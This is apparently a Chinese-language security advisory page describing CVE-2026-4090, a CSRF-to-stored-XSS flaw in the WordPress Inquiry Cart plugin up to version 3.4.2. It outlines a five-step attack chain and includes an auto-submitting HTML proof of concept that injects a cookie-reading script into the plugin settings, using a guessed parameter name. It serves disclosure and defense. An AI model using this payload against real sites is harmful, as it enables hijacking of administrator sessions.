CVE-2026-4090 CVSS 6.1 中危

CVE-2026-4090 WordPress Inquiry Cart插件CSRF漏洞

披露日期: 2026-04-22

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4090

漏洞类型

跨站请求伪造 (CSRF)

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

WordPress Inquiry Cart Plugin

漏洞概述

WordPress Inquiry Cart 插件在 3.4.2 及之前版本中存在跨站请求伪造（CSRF）漏洞。该漏洞由于 `rd_ic_settings_page` 函数在处理设置表单提交时缺少 nonce 验证导致。未经身份验证的攻击者可以通过诱导管理员点击恶意链接，伪造请求更新插件设置。这可能导致攻击者在管理区域注入并执行恶意脚本，造成进一步的安全风险。

技术细节

该漏洞的核心在于 WordPress Inquiry Cart 插件的 `rd_ic_settings_page` 函数未实现 nonce 验证机制。在 WordPress 生态中，nonce 是防止 CSRF 攻击的关键安全令牌。由于缺失此验证，攻击者可利用管理员的有效会话，构造特制的 HTTP POST 请求。当管理员被诱导访问攻击者控制的页面时，浏览器会自动携带管理员 Cookie 向插件设置页面发送请求。攻击者可利用此机制篡改插件配置，具体包括注入恶意的 JavaScript 代码。这些代码被持久化存储后，每当管理员访问后台管理面板时，恶意脚本便会自动执行，从而可能导致管理员账户被劫持或敏感数据泄露。

攻击链分析

STEP 1

侦察识别

攻击者确认目标网站安装了 WordPress Inquiry Cart 插件，且版本低于或等于 3.4.2。

STEP 2

构建载荷

攻击者编写 HTML 页面，包含自动提交的表单，表单目标为插件设置接口，并包含用于 XSS 的恶意脚本参数。

STEP 3

诱导交互

攻击者通过钓鱼邮件或社会工程学手段，诱导已登录的管理员访问包含恶意载荷的链接。

STEP 4

执行伪造请求

管理员浏览器在加载页面时，利用当前登录态自动向服务器发送修改设置的 POST 请求。

STEP 5

存储与触发

服务器接收请求并更新插件配置，恶意脚本被存入数据库。当管理员下次访问后台时，XSS 触发。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- PoC for CVE-2026-4090: CSRF to Stored XSS -->
<!-- Save this as an HTML file and host it. When an admin visits, the setting is updated. -->
<html>
  <body>
    <form action="http://target-wordpress-site/wp-admin/admin.php?page=rd-inquiry-cart-settings" method="POST">
      <!-- Assuming a parameter name based on common WP plugin structures -->
      <input type="hidden" name="rd_ic_some_setting" value="<script>alert(document.cookie)</script>" />
      <input type="hidden" name="action" value="update" />
      <input type="submit" value="Click me!" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

影响范围

Inquiry Cart <= 3.4.2

防御指南

临时缓解措施

在升级插件之前，建议暂时卸载或禁用 Inquiry Cart 插件以阻断攻击面。同时，管理员应避免点击不明来源的链接，并加强对后台管理会话的监控。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表